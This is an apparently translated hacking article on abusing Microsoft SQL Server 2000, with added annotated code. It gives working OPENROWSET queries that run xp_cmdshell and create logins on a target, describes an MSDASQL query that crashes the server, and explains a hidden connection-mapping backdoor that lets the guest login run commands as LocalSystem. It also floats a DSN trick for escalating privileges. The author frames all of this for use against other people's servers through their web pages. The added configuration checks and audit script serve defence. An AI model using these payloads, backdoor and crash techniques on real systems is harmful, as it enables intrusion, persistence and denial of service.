Skill | SQL Injection
1. About OPENROWSET and OPENDATASOURCE
2. A problem with sending two requests through MSDASQL
3. A scary backdoor
Here I'll talk about a few new SQL Server quirks that I found, with some luck, after a long period of poking around. I don't want to keep them to myself, so I'm putting them out here for everyone to review and correct.
1. About OPENROWSET and OPENDATASOURCE
Perhaps someone has already used this trick of sending local commands through OPENROWSET. The usual way of using it (including in MSDN) looks like this:

SELECT * FROM OPENROWSET('SQLOLEDB', 'myserver';'sa';'', 'select * from Table')

On the face of it (even in the literal sense), OPENROWSET is only a shortcut for accessing a remote database: the provider string must be followed by a SELECT, that is, something that returns a recordset.
So can we use it to invoke xp_cmdshell? The answer is YES!
SELECT * FROM OPENROWSET('SQLOLEDB', 'server';'sa';'', 'set fmtonly off exec master.dbo.xp_cmdshell ''dir c:\''')

The SET FMTONLY OFF is required to override the default setting that returns only column information. With it, the output rowset of xp_cmdshell is handed back to the outer SELECT and displayed; with the default setting, the inner batch returns an empty set, the outer SELECT raises an error, and the command is never executed. (Note the doubled single quotes around dir c:\: the command is a string inside a string.)
What if we want to call sp_addlogin, which, unlike xp_cmdshell, returns no rowset at all? Then the FMTONLY setting no longer helps, and we do the following instead:

SELECT * FROM OPENROWSET('SQLOLEDB', 'server';'sa';'', 'select ''ok!'' exec master.dbo.sp_addlogin hectic')

This way the inner batch returns at least the rowset produced by select 'ok!', so your machine displays ok!, while on the other side a login named hectic has been added to the server. In other words, we use the rowset returned by select 'ok!' to satisfy the local SELECT request, and the command itself executes normally. sp_addsrvrolemember can be called the same way, and OPENDATASOURCE can be abused in the same fashion. How to put this to real use is left for you to think over.
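The three OPENROWSET shapes described above, side by side, as an added example that is not part of the original article. The server name target, the blank sa password, and the login name and password passed to sp_addlogin are placeholders; the outer SELECT runs on the instance you already control, and the inner batch runs on the instance named in the provider string (which may be the same machine). The defender's check at the end is also added here and applies to SQL Server 2005 and later.

```sql
-- Added example (not from the original article). 'target', the blank sa
-- password and the 'hectic' login/password are placeholders.

-- (1) Documented use: the inner query returns a recordset.
SELECT * FROM OPENROWSET('SQLOLEDB', 'target';'sa';'',
    'SELECT name FROM master..sysdatabases');

-- (2) A procedure that returns rows (xp_cmdshell). Without SET FMTONLY OFF
-- the provider's metadata probe sees only column information, the batch
-- yields an empty result, the outer SELECT fails and the command never runs.
-- The command is a string inside a string, so its quotes are doubled.
SELECT * FROM OPENROWSET('SQLOLEDB', 'target';'sa';'',
    'SET FMTONLY OFF EXEC master.dbo.xp_cmdshell ''dir c:\''');

-- (3) A procedure that returns no rows at all (sp_addlogin). FMTONLY does
-- not help here; prepend a dummy SELECT so the outer query has a rowset to
-- consume while the procedure executes as a side effect.
SELECT * FROM OPENROWSET('SQLOLEDB', 'target';'sa';'',
    'SELECT ''ok!'' EXEC master.dbo.sp_addlogin ''hectic'', ''P@ssw0rd''');

-- Defender's check (SQL Server 2005 and later, where both switches exist):
-- ad hoc distributed queries and xp_cmdshell are off by default and both
-- config_value/run_value columns should read 0 on a hardened instance.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries';
EXEC sp_configure 'xp_cmdshell';
```

On SQL Server 2000, which the article targets, there is no sp_configure switch for this: ad hoc access through a given provider is controlled per provider by the DisallowAdhocAccess registry value under the MSSQLServer\Providers key, and xp_cmdshell is available to sysadmin out of the box. Everything in (2) and (3) also requires that the account named in the provider string can reach the target, so a blank or known sa password, or a trusted connection from a privileged service account, is the real enabler.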
2. A problem with sending two requests through MSDASQL
I don't know whether you have tried connecting to a remote database through MSDASQL; of course, this provider can only be called by a SQL Server administrator. Consider the following:

SELECT * FROM OPENROWSET('MSDASQL', 'Driver={SQL Server};server=server;address=server,1433;uid=sa;pwd=;database=master;network=dbmssocn', 'select * from table1 select * from table2')

When table1 and table2 have different numbers of columns, you will find that the other side's SQL Server crashes: even local connections fail, although system resource usage looks completely normal. After killing the SQL Server process with PsKill, unless the machine is rebooted, SQL Server either fails to start properly or keeps faulting. I stumbled on this bug by chance and have not worked out the exact cause. Oddly, it only shows up with MSDASQL; SQLOLEDB does not have the problem, so it does not seem to be simply the mismatch between the number of requests and the number of result sets returned, but rather something in MSDASQL itself. As for the specific cause, let's study it together.
3. A scary backdoor
I have seen people on the Internet say that you can leave a backdoor on SQL Server by adding a trigger or a job, or by overwriting sp_addlogin and sp_addsrvrolemember. That works, of course, but it is easy to spot. I wonder whether anyone has thought about SQLOLEDB's local connection mapping. For example, using a SQL Server administrator account on the other side's SQL Server, run the following command:

SELECT * FROM OPENROWSET('SQLOLEDB', 'Trusted_connection=yes;data source=hectic', 'set fmtonly off exec master..xp_cmdshell ''dir c:\''')

This creates a local connection mapping named hectic on the other side's SQL Server. As long as SQL Server is not restarted, the mapping persists, and at least I do not know of a way to find a connection mapping that someone else has left behind. Once the command above has run, you will find that even the guest login, which has no permissions at all on SQL Server, can run the same command, and it executes as LocalSystem (the default installation's service account)! This method can be used to leave a backdoor on a SQL Server on which administrator privileges have already been obtained. I have verified it on SQL Server 2000 and SQL Server 2000 SP1.
There is also a conjecture. I don't know whether you have noticed that Windows ships by default with two DSNs, one named LocalServer and one named MSQI, both of which are set up as connections to SQL Server under the local Administrator account. If the other side's SQL Server service runs under a custom account that is only a Power User, then sa's operating-system rights are just those of a Power User and it is hard to do anything big. But through the following command:

SELECT * FROM OPENROWSET('MSDASQL', 'dsn=localserver;trusted_connection=yes', 'set fmtonly off exec master..xp_cmdshell ''dir c:\''')

you should be able to connect to the local SQL Server through the LocalServer DSN's administrator account and then execute local commands with that account's rights; I think this should be able to break out of a Power-User-level sa. The problem now is that SQLOLEDB cannot use a DSN connection, and guest is not allowed to call MSDASQL, so I am looking for a way for guest to call MSDASQL.
If anyone knows how to get around this or has a new idea, let's discuss it. If it can be made to work for guest, it would be a very serious security vulnerability, because any of the SQL statements mentioned above can be submitted through the other side's ASP pages and executed for us.
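An audit script for the persistence routes this section names (logins and sysadmin members added through sp_addlogin/sp_addsrvrolemember, execute rights on xp_cmdshell reaching guest or public, linked servers, jobs and triggers), as an added example that is not part of the original article. It uses the SQL Server 2000 system tables and is meant to be run as sysadmin on the instance being checked. It does not claim to surface the connection mapping the author describes, which he says he does not know how to find; it only covers the conventional routes he mentions alongside it.

```sql
-- Added audit example (not from the original article). Run as sysadmin on
-- SQL Server 2000; system table names are the 2000-era ones.
USE master;

-- 1. Who may execute xp_cmdshell? Only sysadmin members should be able to.
--    Any GRANT to guest, public or an unfamiliar user is a red flag.
EXEC sp_helprotect 'xp_cmdshell';

-- 2. Logins and sysadmin members, newest first: look for names you did not
--    create (the article's example adds a login called 'hectic').
SELECT name, sysadmin, createdate, updatedate
FROM master.dbo.syslogins
ORDER BY createdate DESC;

-- 3. Linked/remote server entries. srvid 0 is the local instance; anything
--    else is a configured remote that the text's OPENROWSET calls did not need
--    but a less subtle attacker might have left.
SELECT srvname, srvproduct, providername, datasource, catalog
FROM master.dbo.sysservers
WHERE srvid <> 0;

-- 4. SQL Agent jobs with their step commands; a job step that calls
--    xp_cmdshell or sp_addlogin is the "job" backdoor the text mentions.
SELECT j.name, j.enabled, s.step_id, s.subsystem, s.command
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
ORDER BY j.name, s.step_id;

-- 5. Triggers (run this per database; shown here for master). A trigger on a
--    busy table is the other persistence route the text names.
SELECT name, crdate
FROM sysobjects
WHERE xtype = 'TR';

-- 6. Has a system procedure been replaced? The text mentions overwriting
--    sp_addlogin and sp_addsrvrolemember; compare their creation and update
--    dates with the rest of master's system procedures.
SELECT name, crdate, refdate
FROM sysobjects
WHERE name IN ('sp_addlogin', 'sp_addsrvrolemember');
```

The DSN angle in the article's last section lives outside SQL Server: system DSNs such as LocalServer are stored under HKLM\SOFTWARE\ODBC\ODBC.INI, so check there (and the service account the MSSQLServer service runs under) when reviewing a box. Whatever account that service runs as is the account xp_cmdshell executes as, which is why the text's LocalSystem default matters.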